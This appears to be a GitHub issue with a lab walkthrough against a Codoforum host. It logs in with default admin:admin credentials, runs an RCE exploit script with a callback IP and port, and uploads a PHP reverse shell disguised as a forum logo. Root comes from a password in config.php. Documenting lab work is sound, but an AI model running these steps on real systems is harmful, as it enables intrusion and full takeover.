Open WDavid404 opened 1 month ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: All topics | CODOLOGIC
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Access 80 webpage,
Login success with admin:admin
--》 Codoforum v5.1.105
searchsploit codoforum --> Remote Code Execution (RCE) 50978.py
python3 50978.py -t http://192.168.187.23 -u admin -p admin -i 192.168.45.222 -n 4444
(Need to run burpsuite as 8080 port proxy )
--》 didn't work
Then, Access with admin:admin to http://192.168.203.23/admin/ admin panel > global settings > change forum logo > upload a reverse php file (reverse php file: https://github.com/pentestmonkey/php-reverse-shell)
Access http://192.168.203.23/sites/default/assets/img/attachments/php-reverse-shell.php ---> Got reverse shell from the target
PE: linpeas--> cat /var/www/html/sites/default/config.php
use the password to switch user --> This password apply for root user
Key points: